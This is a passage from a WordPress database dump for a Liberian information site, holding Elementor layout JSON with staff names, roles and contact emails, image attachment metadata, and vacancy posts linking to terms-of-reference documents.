href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34902,5100,'_elementor_pro_version','3.7.1'),(34903,80,'_elementor_controls_usage','a:7:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:2;s:5:\"align\";i:1;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:88;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:85;s:21:\"space_between_widgets\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:32;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:32;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:28;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:42;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:42;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:10:\"text_color\";i:42;s:21:\"typography_typography\";i:41;s:20:\"typography_font_size\";i:41;s:5:\"align\";i:42;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:36;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:6:{s:5:\"image\";i:34;s:10:\"image_size\";i:9;s:22:\"image_custom_dimension\";i:5;s:14:\"caption_source\";i:5;s:7:\"link_to\";i:5;s:4:\"link\";i:5;}}s:5:\"style\";a:1:{s:21:\"section_style_caption\";a:2:{s:10:\"text_color\";i:5;s:29:\"caption_typography_typography\";i:1;}}}}}'),(34905,5101,'_edit_lock','1663682088:42'),(34906,5101,'_last_editor_used_jetpack','block-editor'),(34907,5102,'_wp_attached_file','2022/09/dialogue.png'),(34908,5102,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2022/09/dialogue.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"dialogue-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"dialogue-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"dialogue-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"dialogue-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"dialogue-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"dialogue-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"dialogue-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:20:\"dialogue-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"dialogue-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:20:\"dialogue-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:20:\"dialogue-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34911,5101,'_wp_old_date','2022-09-20'),(34912,5101,'_thumbnail_id','5102'),(34913,5101,'_edit_last','42'),(34914,5101,'kava_extra_enable_breadcrumbs','inherit'),(34915,5101,'post_formats',''),(34916,5101,'gallery_tab',''),(34917,5101,'kava_extra_gallery_images',''),(34918,5101,'link_tab',''),(34919,5101,'kava_extra_link',''),(34920,5101,'kava_extra_link_target','_blank'),(34921,5101,'quote_tab',''),(34922,5101,'kava_extra_quote_text',''),(34923,5101,'kava_extra_quote_cite',''),(34924,5101,'audio_tab',''),(34925,5101,'kava_extra_audio',''),(34926,5101,'kava_extra_audio_loop','false'),(34927,5101,'kava_extra_audio_autoplay','false'),(34928,5101,'kava_extra_audio_preload','false'),(34929,5101,'video_tab',''),(34930,5101,'kava_extra_video_type','library'),(34931,5101,'kava_extra_video_library',''),(34932,5101,'kava_extra_video_external',''),(34933,5101,'kava_extra_video_poster',''),(34934,5101,'kava_extra_video_width','770'),(34935,5101,'kava_extra_video_height','480'),(34936,5101,'kava_extra_video_loop','false'),(34937,5101,'kava_extra_video_autoplay','false'),(34938,5101,'kava_extra_video_preload','false'),(34949,5109,'_last_editor_used_jetpack','classic-editor'),(34950,5109,'_edit_lock','1663775635:42'),(34951,5109,'_edit_last','42'),(34952,5110,'_wp_attached_file','2022/09/ToR-Project-Manager_Resilient-Recovery-Rapid-Readiness-Suppor444444444.docx'),(34953,5109,'_wp_page_template','default'),(34954,5109,'closed_date','2022-09-25'),(34955,5109,'owner','EPA'),(34956,5109,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/09/ToR-Project-Manager_Resilient-Recovery-Rapid-Readiness-Suppor444444444.docx'),(34957,5113,'_last_editor_used_jetpack','classic-editor'),(34958,5113,'_edit_lock','1663776313:42'),(34959,5113,'_edit_last','42'),(34963,5114,'_wp_attached_file','2022/09/Consultant-to-Review-Analysis-Report-of-the-Impact-of-COVID.docx'),(34964,5113,'_wp_page_template','default'),(34965,5113,'closed_date','2022-10-07'),(34966,5113,'owner','EPA'),(34967,5113,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Consultant-to-Review-Analysis-Report-of-the-Impact-of-COVID.docx'),(34968,5116,'_last_editor_used_jetpack','classic-editor'),(34969,5116,'_edit_lock','1663776583:42'),(34970,5116,'_edit_last','42'),(34971,5117,'_wp_attached_file','2022/09/Expert-Consultant.docx'),(34972,5116,'_wp_page_template','default'),(34973,5116,'closed_date','2022-10-07'),(34974,5116,'owner','EPA'),(34975,5116,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-Consultant.docx'),(34976,5119,'_last_editor_used_jetpack','classic-editor'),(34977,5119,'_edit_lock','1663777581:42'),(34978,5119,'_edit_last','42'),(34979,5120,'_wp_attached_file','2022/09/Expert-to-Conduct-Desk-Review-of-the-PAPD.docx'),(34980,5119,'_wp_page_template','default'),(34981,5119,'closed_date','2022-10-07'),(34982,5119,'owner','EPA'),(34983,5119,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-to-Conduct-Desk-Review-of-the-PAPD.docx'),(34984,5122,'_edit_lock','1663931377:42'),(34985,5122,'_last_editor_used_jetpack','block-editor'),(34986,5123,'_wp_attached_file','2022/09/arcelormittal.jpg'),(34987,5123,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2022/09/arcelormittal.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"arcelormittal-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"arcelormittal-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"arcelormittal-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"arcelormittal-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"arcelormittal-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"arcelormittal-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"arcelormittal-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:25:\"arcelormittal-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"arcelormittal-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:25:\"arcelormittal-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:25:\"arcelormittal-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34990,5122,'_thumbnail_id','5123'),(34991,5122,'_edit_last','42'),(34992,5122,'kava_extra_enable_breadcrumbs','inherit'),(34993,5122,'post_formats',''),(34994,5122,'gallery_tab',''),(34995,5122,'kava_extra_gallery_images',''),(34996,5122,'link_tab',''),(34997,5122,'kava_extra_link',''),(34998,5122,'kava_extra_link_target','_blank'),(34999,5122,'quote_tab',''),(35000,5122,'kava_extra_quote_text',''),(35001,5122,'kava_extra_quote_cite',''),(35002,5122,'audio_tab',''),(35003,5122,'kava_extra_audio',''),(35004,5122,'kava_extra_audio_loop','false'),(35005,5122,'kava_extra_audio_autoplay','false'),(35006,5122,'kava_extra_audio_preload','false'),(35007,5122,'video_tab',''),(35008,5122,'kava_extra_video_type','library'),(35009,5122,'kava_extra_video_library',''),(35010,5122,'kava_extra_video_external',''),(35011,5122,'kava_extra_video_poster',''),(35012,5122,'kava_extra_video_width','770'),(35013,5122,'kava_extra_video_height','480'),(35014,5122,'kava_extra_video_loop','false'),(35015,5122,'kava_extra_video_autoplay','false'),(35016,5122,'kava_extra_video_preload','false'),(35017,5125,'_edit_lock','1663934405:42'),(35018,5125,'_last_editor_used_jetpack','block-editor'),(35019,5126,'_wp_attached_file','2022/09/MOA.jpg'),(35020,5126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/09/MOA.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"MOA-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MOA-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"MOA-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"MOA-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"MOA-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"MOA-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"MOA-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"MOA-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"MOA-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"MOA-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"MOA-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35023,5125,'_wp_old_date','2022-09-23'),(35024,5125,'_thumbnail_id','5126'),(35025,5125,'_edit_last','42'),(35026,5125,'kava_extra_enable_breadcrumbs','inherit'),(35027,5125,'post_formats',''),(35028,5125,'gallery_tab',''),(35029,5125,'kava_extra_gallery_images',''),(35030,5125,'link_tab',''),(35031,5125,'kava_extra_link',''),(35032,5125,'kava_extra_link_target','_blank'),(35033,5125,'quote_tab',''),(35034,5125,'kava_extra_quote_text',''),(35035,5125,'kava_extra_quote_cite',''),(35036,5125,'audio_tab',''),(35037,5125,'kava_extra_audio',''),(35038,5125,'kava_extra_audio_loop','false'),(35039,5125,'kava_extra_audio_autoplay','false'),(35040,5125,'kava_extra_audio_preload','false'),(35041,5125,'video_tab',''),(35042,5125,'kava_extra_video_type','library'),(35043,5125,'kava_extra_video_library',''),(35044,5125,'kava_extra_video_external',''),(35045,5125,'kava_extra_video_poster',''),(35046,5125,'kava_extra_video_width','770'),(35047,5125,'kava_extra_video_height','480'),(35048,5125,'kava_extra_video_loop','false'),(35049,5125,'kava_extra_video_autoplay','false'),(35050,5125,'kava_extra_video_preload','false'),(35051,5128,'_edit_lock','1663934909:42'),(35052,5128,'_last_editor_used_jetpack','block-editor'),(35053,5129,'_wp_attached_file','2022/09/MOA-1.jpg'),(35054,5129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2022/09/MOA-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"MOA-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"MOA-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"MOA-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"MOA-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"MOA-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"MOA-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"MOA-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"MOA-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"MOA-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"MOA-1-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"MOA-1-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35057,5128,'_wp_old_date','2022-09-23'),(35058,5128,'_thumbnail_id','5129'),(35059,5128,'_edit_last','42'),(35060,5128,'kava_extra_enable_breadcrumbs','inherit'),(35061,5128,'post_formats',''),(35062,5128,'gallery_tab',''),(35063,5128,'kava_extra_gallery_images',''),(35064,5128,'link_tab',''),(35065,5128,'kava_extra_link',''),(35066,5128,'kava_extra_link_target','_blank'),(35067,5128,'quote_tab',''),(35068,5128,'kava_extra_quote_text',''),(35069,5128,'kava_extra_quote_cite',''),(35070,5128,'audio_tab',''),(35071,5128,'kava_extra_audio',''),(35072,5128,'kava_extra_audio_loop','false'),(35073,5128,'kava_extra_audio_autoplay','false'),(35074,5128,'kava_extra_audio_preload','false'),(35075,5128,'video_tab',''),(35076,5128,'kava_extra_video_type','library'),(35077,5128,'kava_extra_video_library',''),(35078,5128,'kava_extra_video_external',''),(35079,5128,'kava_extra_video_poster',''),(35080,5128,'kava_extra_video_width','770'),(35081,5128,'kava_extra_video_height','480'),(35082,5128,'kava_extra_video_loop','false'),(35083,5128,'kava_extra_video_autoplay','false'),(35084,5128,'kava_extra_video_preload','false'),(35085,5131,'_edit_lock','1663935242:42'),(35086,5131,'_last_editor_used_jetpack','block-editor'),(35087,5132,'_wp_attached_file','2022/09/fda-1.png'),(35088,5132,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2022/09/fda-1.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"fda-1-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"fda-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"fda-1-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"fda-1-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"fda-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"fda-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"fda-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"fda-1-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i: